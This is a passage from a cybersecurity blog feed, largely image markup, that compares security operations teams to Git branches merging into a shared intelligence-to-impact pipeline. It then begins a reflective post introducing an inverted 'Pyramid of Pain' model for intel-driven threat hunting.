stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">image courtesy of git-graph <a href="https://lib.rs/crates/git-graph?ref=quasarops.com">https://lib.rs/crates/git-graph</a></figcaption></figure></div><p>Whoa, hold on! Git? Repositories? Is this getting too weird?</p><p>Don't worry, it's simpler than it sounds. The true power lies in how it mirrors the way a successful data pipeline <em>should</em>&nbsp;function in a data-centric organisation, like a well-oiled code-merging machine!</p><p><em>it doesn't matter whether you are an "operational" function or not...</em></p><p>Think of it this way: each team in your cyber organisation is like a branch in a Git repository. Your IR team has their branch, your Detection Engineering team has theirs, and so on. Each branch is working on its own BAU workload and features, gathering unique data, and generating valuable insights.</p><p>Now, imagine your main data pipeline as the "main" branch in your repository. Just like developers merge their code changes into the main branch to create a final product, each team "merges" their data and insights into the main data pipeline,&nbsp;<strong>at different stages of the pipeline</strong>.</p><p>The end goal? to create an impact on the opposite end of the pipe, where you influence your risk and control areas.</p><p>Now, think of your team or function as a "repository" &#8211; a central hub where all these changes are stored and shared. This means everyone is on the same page, working together towards a common goal.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!weDP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!weDP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg 424w, https://substackcdn.com/image/fetch/$s_!weDP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg 848w, https://substackcdn.com/image/fetch/$s_!weDP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg 1272w, https://substackcdn.com/image/fetch/$s_!weDP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!weDP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg" width="1307" height="372" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:372,&quot;width&quot;:1307,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!weDP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg 424w, https://substackcdn.com/image/fetch/$s_!weDP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg 848w, https://substackcdn.com/image/fetch/$s_!weDP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg 1272w, https://substackcdn.com/image/fetch/$s_!weDP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b271c10-7ede-46de-87e0-99cc340699db_1307x372.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>You have different Merging points where a function or a team's output plugs into another team's input at a certain point in the pipeline, effectively&nbsp;<em>merging</em>&nbsp;their operative outcomes with another team's operative input, triggering a process on their side.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fjYL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fjYL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg 424w, https://substackcdn.com/image/fetch/$s_!fjYL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg 848w, https://substackcdn.com/image/fetch/$s_!fjYL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg 1272w, https://substackcdn.com/image/fetch/$s_!fjYL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fjYL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg" width="1307" height="417" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:417,&quot;width&quot;:1307,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!fjYL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg 424w, https://substackcdn.com/image/fetch/$s_!fjYL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg 848w, https://substackcdn.com/image/fetch/$s_!fjYL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg 1272w, https://substackcdn.com/image/fetch/$s_!fjYL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff6fce35e-6731-45da-8777-bb8490377e73_1307x417.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>At different points in the pipeline, you can keep your finger on the pulse by capturing and reporting on some metrics that are meaningful to you. Each function or team can have their own and you can come up with merged stats for the main pipeline:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8Qsy!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8Qsy!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg 424w, https://substackcdn.com/image/fetch/$s_!8Qsy!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg 848w, https://substackcdn.com/image/fetch/$s_!8Qsy!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg 1272w, https://substackcdn.com/image/fetch/$s_!8Qsy!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8Qsy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg" width="1307" height="401" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:401,&quot;width&quot;:1307,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!8Qsy!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg 424w, https://substackcdn.com/image/fetch/$s_!8Qsy!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg 848w, https://substackcdn.com/image/fetch/$s_!8Qsy!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg 1272w, https://substackcdn.com/image/fetch/$s_!8Qsy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F818b017e-13bf-4532-a3f1-4d682a1334e9_1307x401.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>While Git's ability to rewind is cool, that's not the real magic when it comes to building a data-centric operations workflow. By conceptualising operations this way, we are not saying you can go back in time, but that&nbsp;<em>your operational pipe becomes a DevOpsified version of itself</em>.</p><h2>Applying it to R1D3</h2><p>Remember&nbsp;<a href="https://www.quasarops.com/p/r1d3-threat-driven-defence-p1">R1D3</a>? Let's use that framework as an example of how we can apply this "Git" thinking to your operations model.</p><p>We could draw the main stages of R1D3 in the main pipeline, and then we can imagine how some teams or functions would contribute to it at different points in time.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Umtn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Umtn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg 424w, https://substackcdn.com/image/fetch/$s_!Umtn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg 848w, https://substackcdn.com/image/fetch/$s_!Umtn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg 1272w, https://substackcdn.com/image/fetch/$s_!Umtn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Umtn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg" width="2073" height="705" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:705,&quot;width&quot;:2073,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!Umtn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg 424w, https://substackcdn.com/image/fetch/$s_!Umtn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg 848w, https://substackcdn.com/image/fetch/$s_!Umtn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg 1272w, https://substackcdn.com/image/fetch/$s_!Umtn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F76b23cb5-837b-4762-a749-213f50fb18f4_2073x705.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The main things to notice in the above diagram are:</p><ul><li><p>It's just a model, and as I always echo:&nbsp;<em>all models are wrong, some models are useful</em></p></li><li><p>A function like Intel obtains real-time data from the DFIR &amp; Monitoring function based on analysis of signals</p></li><li><p>Modelling done by Intel analysis feeds into your Discovery phase where people like your threat hunters could be working their magic</p></li><li><p>An imagined Vuln. Management function would feed their assessments of the system's landscape to your Discovery phase too</p></li><li><p>Your DFIR team will contribute and merge their efforts directly into the Disruption phase</p></li><li><p>Eventually, all teams converge at the Development stage where insights are translated into impact by materially improving your controls</p></li><li><p>Your pipeline works in terms of "Releases" where each release means that a certain amount of actions have been performed in your network to drive controls and risk either up or down</p></li><li><p>There is a feedback loop, whereby all the artefacts released by your pipeline can feed back into your functions</p></li></ul><p>Now, imagine if you could deploy such a pipeline by adapting your existing ITSM ticketing tools or workflow automation suites. What if you could actually have a repository where all your operational data is stored as YAML files or similar?</p><p><em>I will leave that to your imagination</em> ;)</p><p>Thanks for staying with me this long ;) I hope you enjoyed my musings</p>]]></content:encoded></item><item><title><![CDATA[Threat Hunting Pyramid of Pain]]></title><description><![CDATA[This article presents a novel approach to threat hunting and analysis called the Intel-Driven Data Analysis (IDDA) Pyramid of Pain. A nine-step process, starting with understanding the context of a threat, extracting key indicators and highlighting the importance of assessing the organization's own environment, including its attack surface, vulnerabilities, and security controls.&#160; Finally, it advocates for proactive defence by simulating attacks and building predictive models to anticipate future threats.]]></description><link>https://www.quasarops.com/p/threat-hunting-pyramid-of-pain</link><guid isPermaLink="false">https://www.quasarops.com/p/threat-hunting-pyramid-of-pain</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Thu, 13 Jun 2024 07:00:56 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/d4ba9ed8-8727-4ce9-9f14-e8935f849c77_2000x1961.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!v1KE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!v1KE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp 424w, https://substackcdn.com/image/fetch/$s_!v1KE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp 848w, https://substackcdn.com/image/fetch/$s_!v1KE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp 1272w, https://substackcdn.com/image/fetch/$s_!v1KE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!v1KE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Threat Hunting Pyramid of Pain&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Threat Hunting Pyramid of Pain" title="Threat Hunting Pyramid of Pain" srcset="https://substackcdn.com/image/fetch/$s_!v1KE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp 424w, https://substackcdn.com/image/fetch/$s_!v1KE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp 848w, https://substackcdn.com/image/fetch/$s_!v1KE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp 1272w, https://substackcdn.com/image/fetch/$s_!v1KE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2199a151-99cc-4688-9455-cbf13ec97d82_2000x1961.webp 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>Hello everyone, it seems like a long time since this cyberscout wrote one of his usual stories.</p><p>The tales of a cyberscout are simply whispers by the fireside in a forest's clearing.</p><p>In the wilderness, you need stories. Stories help you notice little things nobody else notices, stories become your inner compass, and they guide you towards meaning.</p><p>My stories speak of fantastic creatures and magical artefacts forged by mysterious wizards. This is how lore is passed down through generations. <strong>Generative lore</strong> I like to call it.</p><p>Allow yourself to sit and tune into the right frequency and it will offer many hints about a much deeper story though.</p><p>It is about vibration.</p><p>It cannot be reduced to ML algorithms.</p><p>There is no "statistical shortcut" through the sensorial centre of gravity that brings meaning to our lives.</p><p>Today, I will tell you a story about a Pyramid, an inverted one that is. There is no specific reason for it, other than I thought the narrow pointy base is representative of less effort (less surface, less scaffolding needed to maintain the structure) whereas the wider top represents a higher effort (more surface, more scaffolding and upward energy/resources required to maintain the structure). If at any point in time, the flow of resources needed to maintain the structure of the inverted pyramid is interrupted, it risks collapsing on itself.</p><p>For me, the inverted pyramid represents a struggle.</p><p>A fight against increasing entropy and decay.</p><p>Therein lies the pain. And the gain?</p><h1>IDDA: Intel-Driven Data Analysis Pyramid of Pain</h1><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!euKU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg" 